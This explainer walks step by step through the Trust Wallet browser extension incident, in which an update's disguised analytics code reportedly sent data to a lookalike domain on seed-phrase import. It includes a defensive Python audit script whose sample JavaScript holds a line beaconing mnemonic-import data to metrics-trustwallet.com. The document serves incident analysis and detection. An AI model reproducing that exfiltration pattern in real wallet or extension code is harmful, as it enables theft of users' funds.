TrustWallet Hack Explained: From Update to Wallet Drains worth $16M in $TWT, BTC, ETH


What Exactly Happened in the Trust Wallet Incident


Step 1: A New Browser Extension Update Was Released

A new update for the Trust Wallet browser extension was released on December 24.

  • The update seemed routine.

  • No major security warnings came with it.

  • Users installed it through the usual update process.

At this point, nothing seemed suspicious.


Step 2: New Code Was Added to the Extension

After the update, researchers looking into the extension’s files noticed changes in a JavaScript file known as 4482.js.

Key observation:

  • The new code was not in earlier versions.

  • It introduced network requests linked to user actions.

This matters because browser wallets are very sensitive environments; any new outgoing logic poses a high risk.


Step 3: Code Masqueraded as “Analytics”

The added logic appeared as analytics or telemetry code.

Specifically:

  • It looked like tracking logic used by common analytics SDKs.

  • It did not trigger all the time.

  • It activated only under certain conditions.

This design made it harder to detect during casual testing.


Step 4: Trigger Condition — Importing a Seed Phrase

Community reverse-engineering suggests the logic was triggered when a user imported a seed phrase into the extension.

Why this is critical:

  • Importing a seed phrase gives the wallet full control.

  • This is a one-time, high-value moment.

  • Any malicious code only needs to act once.

Users who only used existing wallets may not have triggered this path.


Step 5: Wallet Data Was Sent Externally

When the trigger condition occurred, the code allegedly sent data to an external endpoint:

metrics-trustwallet[.]com

What raised alarms:

  • The domain looked a lot like a legitimate Trust Wallet subdomain.

  • It was registered only days earlier.

  • It was not publicly documented.

  • It later went offline.

At a minimum, this confirms unexpected outgoing communication from the wallet extension to a domain outside Trust Wallet's own infrastructure.
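Steps 2 through 5 describe the pattern an extension audit should catch: a new build adds a network sink, it fires only near seed-phrase handling, and it talks to a brand-lookalike host rather than an official subdomain. The script below is an added example, not code from the page or from Trust Wallet; it diffs the URL literals in two constructed sample chunks (stand-ins for the old and new 4482.js), flags hosts that only appear in the new build, classifies them against an assumed allowlist of official domains, and reports whether the referencing line touches sensitive keywords.

```python
import re
from urllib.parse import urlparse

# Constructed sample chunks (not the real 4482.js): the "before" and "after" of an update.
# The second function models the reported pattern: a beacon that fires only on mnemonic import.
OLD_CHUNK = '''
function track(ev){return fetch("https://api.trustwallet.com/v1/events",{method:"POST",body:JSON.stringify(ev)});}
'''
NEW_CHUNK = OLD_CHUNK + '''
function m(p){if(p.kind==="import_mnemonic"){navigator.sendBeacon("https://metrics-trustwallet.com/c",JSON.stringify(p));}}
'''

OFFICIAL_DOMAINS = {"trustwallet.com"}            # assumed allowlist for this audit
BRAND_TOKENS = ("trustwallet", "trust-wallet")     # brand strings a lookalike host would reuse
SENSITIVE = ("mnemonic", "seed", "phrase", "privatekey", "secret")

URL_RE = re.compile(r'''["'](https?://[^"'\s]+)["']''')

def endpoints(js):
    """Map each hostname referenced by a URL literal to the source lines that reference it."""
    out = {}
    for line in js.splitlines():
        for url in URL_RE.findall(line):
            out.setdefault(urlparse(url).hostname, []).append(line)
    return out

def classify(host):
    # Suffix match, not substring match: "metrics-trustwallet.com" is NOT under trustwallet.com.
    if any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS):
        return "official"
    if any(t in host for t in BRAND_TOKENS):
        return "lookalike"       # carries the brand name but sits outside the allowlist
    return "third-party"

def audit(old_js, new_js):
    """Return {host: (verdict, touches_sensitive)} for hosts absent from the old build."""
    old, new = endpoints(old_js), endpoints(new_js)
    report = {}
    for host, lines in new.items():
        if host in old:
            continue
        sensitive = any(s in l.lower() for l in lines for s in SENSITIVE)
        report[host] = (classify(host), sensitive)
    return report

if __name__ == "__main__":
    for host, (verdict, sensitive) in audit(OLD_CHUNK, NEW_CHUNK).items():
        print(f"{host}: {verdict}, referenced near sensitive data: {sensitive}")
```

On the sample input the only new host is metrics-trustwallet.com, classified as a lookalike and referenced on a line that handles a mnemonic import; a real audit would run the same diff over every file in the unpacked extension for both versions.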


Step 6: Attackers Acted Immediately

Shortly after seed phrase imports, users reported:

  • Wallets drained within minutes.

  • Multiple assets moved quickly.

  • No further user interaction was needed.

On-chain behavior showed:

  • Automated transaction patterns.

  • Multiple destination addresses.

  • No obvious phishing approval flow.

This suggests attackers already had enough access to sign transactions.


Step 7: Funds Were Consolidated Across Addresses

Stolen assets were routed through several attacker-controlled wallets.

Why this matters:

  • It suggests coordination or scripting.

  • It reduces reliance on a single address.

  • It matches behavior seen in organized exploits.

Estimates based on tracked addresses suggest millions of dollars moved, although totals vary.


Step 8: The Domain Went Dark

After attention increased:

  • The suspicious domain stopped responding.

  • No public explanation followed immediately.

  • Screenshots and cached evidence became crucial.

This is consistent with attackers destroying infrastructure once exposed.


Step 9: Official Acknowledgment Came Later

Trust Wallet later confirmed:

  • A security incident affected a specific version of the browser extension.

  • Mobile users were not affected.

  • Users should upgrade or disable the extension.

However, no full technical breakdown was given right away to explain:

  • Why the domain existed.

  • Whether seed phrases were exposed.

  • Whether this was an internal, third-party, or external issue.

This gap fueled ongoing speculation.


What Is Confirmed

  • A browser extension update introduced new outgoing behavior.

  • Users lost funds shortly after importing seed phrases.

  • The incident was limited to a specific version.

  • Trust Wallet acknowledged a security issue.


What Is Strongly Suspected

  • A supply-chain issue or malicious code injection.

  • Seed phrases or signing ability being exposed.

  • The analytics logic being misused or weaponized.


What Is Still Unknown

  • Whether the code was intentionally malicious or compromised upstream.

  • How many users were affected.

  • Whether any other data was taken.

  • Exact attribution of the attackers.


Why This Incident Matters

This was not typical phishing.

It highlights:

  • The danger of browser extensions.

  • The risk of blindly trusting updates.

  • How analytics code can be misused.

  • Why handling seed phrases is the most critical moment in wallet security.

Even a short-lived vulnerability can have serious consequences.

